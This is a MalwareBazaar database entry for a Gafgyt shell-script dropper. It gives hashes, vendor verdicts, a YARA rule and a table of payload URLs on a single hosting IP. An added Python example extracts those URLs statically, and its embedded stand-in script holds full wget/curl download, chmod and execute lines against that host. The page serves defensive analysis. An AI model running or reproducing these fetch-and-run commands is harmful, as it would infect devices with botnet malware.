MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Gafgyt


Vendor detections: 7



SHA256 hash: be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba
SHA3-384 hash: 5de9d63d98cb77cc0fdbca3bda8138c5be65cd2d40f2fe2a6efe7ff5d28d61354ca7727fc3d3cc6624d669d65aef5358
SHA1 hash: 773b7d99dca4d18aa489082f3e1c2f8b3504844a
MD5 hash: e2400d1448be0b8bdda1d1f9f5306027
humanhash: nuts-twenty-friend-oscar
File name: bins.sh
Signature: Gafgyt
File size: 2'347 bytes
First seen: 2025-05-04 04:02:16 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 48:1wb0hkwoJdeHfEcVa3cJ/UGfwUNuXF83gMpSRH0oX:1sAfEIoc/UgAFygMpSRH06
TLSH: T14641AF8570A648B4AEA0B9DF72648CC036D2C0967CC6DFF51DF9B4D401ADE9878217C7
Magika: txt
Reporter: abuse_ch
Tags: sh
IOCs

URLs contacted by this sample. Where MalwareBazaar holds the payload served from a URL, its SHA256 hash, signature and tags are listed; "n/a" means no sample has been collected for that URL.

URL | Malware sample (SHA256 hash) | Signature | Tags
http://156.253.227.62/assailant.mips | e1ea9d3dfc9f9c43f0671986c69e105b4f96d87e561d14955ab14a3052701567 | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.mpsl | 7d2077bc6597d4b84b9c605a244bfb6eca988e4a72284c74fd56b0bc47bdaa93 | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.sh4 | 5452b60c50e6db75dc8eceab115a08cfbad194008039d95159d63fef255889b8 | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.x86 | 008ab077a2c0dbb8170f10309c8a22c08a11d6bba7a7a2a0f00273020ea556dc | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.arm6 | a2ef1c6d36abc7ffa2f8b7a13caec7d8d1c048d3b39bc2fa5b7e714386260ba4 | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.i686 | bc4189687af690b4c0a52c76abda81cbb0f1da9ccdea337480a51bd0cf16c5fd | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.ppc | 36177aaa05f44f26801e60c6cf92c5de1061702eb7f9dda467c4d28f0733dca8 | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.i586 | f904aa6c4f4f1d025499c8df8666f2cb6997772224b923d846e32467ffb9e020 | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.m68k | b0faa31f7db6a9984be362bbc2a30aa38fa1e062b2ea89b58e49e8f774f6f0c0 | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.sparc | 778d00bf06a80b52d0380c812318e7fa62d1d2c297f67c2a58b5078516000f4b | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.arm4 | 140bc7e195968b71094ec30ab2f92d8f4b7ae9cc0430ecb4f4b1bbbb0f69dab4 | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.arm5 | 97153806364a450aa25fe57f19085a1390fba01f542b8ed9cad2602abdd2530f | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.arm7 | c67e7a9cb60eb441c9fd86a3c23ab6cd8aaaa2cf434648e694cc55db1c28ce60 | Gafgyt | elf gafgyt ua-wget
http://156.253.227.62/assailant.ppc440fp | n/a | n/a | elf ua-wget
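As an added example (not MalwareBazaar's code and not the contents of sample be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba), the Python below shows how a multi-architecture downloader script of this kind is triaged statically: the fetch URLs are pulled out of the script without executing anything, the CPU architecture each build targets is read from the file extension, the hosting server is collected as an IOC, and each URL is paired with the SHA256 the table above holds for it so that a payload retrieved later in a lab can be checked against the catalogued hash. The script text inside the example is constructed to mirror the URL list above (one fetch per architecture, the usual fetch, chmod, run, delete chain); only the URLs and hashes come from this page, and the hash map covers just the URLs used in the constructed script.

```python
"""Static IOC extraction for a Gafgyt-style multi-architecture dropper.

Added example for this MalwareBazaar entry. SAMPLE_SCRIPT is CONSTRUCTED to
mirror the URL list on the page; it is not the real bins.sh. Nothing here
fetches or executes anything.
"""
import hashlib
import re
from urllib.parse import urlparse

# Constructed stand-in for a bins.sh-style dropper. Only the URLs are page data.
SAMPLE_SCRIPT = """#!/bin/sh
# constructed stand-in, not the real sample
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://156.253.227.62/assailant.mips -O mips; chmod +x mips; ./mips; rm -f mips
wget http://156.253.227.62/assailant.mpsl -O mpsl; chmod +x mpsl; ./mpsl; rm -f mpsl
wget http://156.253.227.62/assailant.arm7 -O arm7; chmod +x arm7; ./arm7; rm -f arm7
wget http://156.253.227.62/assailant.x86 -O x86; chmod +x x86; ./x86; rm -f x86
curl -s -O http://156.253.227.62/assailant.sh4; chmod +x assailant.sh4; ./assailant.sh4
wget http://156.253.227.62/assailant.ppc440fp -O ppc440fp; chmod +x ppc440fp; ./ppc440fp
"""

# SHA256 values the IOC table on this page lists for the hosted payloads
# (only the URLs used in SAMPLE_SCRIPT; ppc440fp has no sample, so it is absent).
KNOWN_PAYLOADS = {
    "http://156.253.227.62/assailant.mips": "e1ea9d3dfc9f9c43f0671986c69e105b4f96d87e561d14955ab14a3052701567",
    "http://156.253.227.62/assailant.mpsl": "7d2077bc6597d4b84b9c605a244bfb6eca988e4a72284c74fd56b0bc47bdaa93",
    "http://156.253.227.62/assailant.arm7": "c67e7a9cb60eb441c9fd86a3c23ab6cd8aaaa2cf434648e694cc55db1c28ce60",
    "http://156.253.227.62/assailant.x86": "008ab077a2c0dbb8170f10309c8a22c08a11d6bba7a7a2a0f00273020ea556dc",
    "http://156.253.227.62/assailant.sh4": "5452b60c50e6db75dc8eceab115a08cfbad194008039d95159d63fef255889b8",
}

URL_RE = re.compile(r"""https?://[^\s;'"|&<>]+""")
FETCHERS = {"wget", "curl", "tftp", "ftpget"}


def _uses_fetcher(line):
    """True if a download tool appears as a command word (also /usr/bin/wget, busybox wget)."""
    return any(tok.rsplit("/", 1)[-1] in FETCHERS for tok in re.split(r"[\s;|&]+", line))


def extract_iocs(script_text):
    """Statically list download URLs in a dropper.

    Returns (hosting hosts, records); each record carries the URL, the
    architecture taken from the file extension (assailant.<arch>), and the
    SHA256 the IOC table holds for that URL, or None when no sample exists.
    """
    found, seen = [], set()
    for line in script_text.splitlines():
        if not _uses_fetcher(line):
            continue
        for url in URL_RE.findall(line):
            if url in seen:
                continue
            seen.add(url)
            arch = urlparse(url).path.rsplit(".", 1)[-1]
            found.append({"url": url, "arch": arch, "sha256": KNOWN_PAYLOADS.get(url)})
    hosts = sorted({urlparse(rec["url"]).netloc for rec in found})
    return hosts, found


def classify_payload(url, blob):
    """Compare bytes retrieved for a URL (in a lab) against the catalogued hash.

    A mismatch on a known URL usually means the hosting server rotated the
    build, i.e. a new sample worth submitting; no reference hash means the
    table has no payload for that URL at all.
    """
    digest = hashlib.sha256(blob).hexdigest()
    expected = KNOWN_PAYLOADS.get(url)
    if expected is None:
        return "no-reference-hash", digest
    return ("match" if digest == expected else "hash-mismatch"), digest


if __name__ == "__main__":
    hosts, iocs = extract_iocs(SAMPLE_SCRIPT)
    print("hosting server(s):", hosts)
    for rec in iocs:
        print(f"{rec['arch']:>9}  {rec['url']}  {rec['sha256'] or 'no sample on MalwareBazaar'}")
    # Constructed bytes stand in for a payload fetched in a lab; they will not match.
    print(classify_payload("http://156.253.227.62/assailant.x86", b"constructed, not the real ELF"))
```

The architecture list is the useful output for defenders: it tells you which device classes the campaign targets (here MIPS, MIPS little-endian, ARMv4 to ARMv7, x86, SuperH, PowerPC, m68k, SPARC), and the single hosting address is the IOC to block. Pairing each URL with the catalogued SHA256 lets a later fetch from the same server be recognised as either the known build or a rotated one.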

Intelligence


File Origin
Uploads: 1
Downloads: 91
Origin country: DE
Vendor Threat Intelligence

Verdict: Malicious
Score: 93.3%
Tags: downloader hype sage

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: lolbin remote

Threat name: Linux.Downloader.Medusa
Status: Malicious
First seen: 2025-05-04 04:03:15 UTC
File type: Text (Shell)
AV detection: 17 of 24 (70.83%)
Threat level: 3/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour:
  Modifies registry class
  Suspicious use of SetWindowsHookEx
  Enumerates physical storage devices
Note that these three behaviours are Windows API activity; a Linux shell script does not touch the registry or SetWindowsHookEx, so they say nothing about what this sample does on the embedded Linux targets its payloads are built for.
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. These are matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are displayed.

Rule name: ach_202412_suspect_bash_script
Author: abuse.ch
Description: Detects suspicious Linux bash scripts

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download
Gafgyt | sh | be965900a62e5c053caabcd22800a497bb2fe9688b95643f76b21a730f9e2eba (this sample)

Delivery method: Distributed via web download

Comments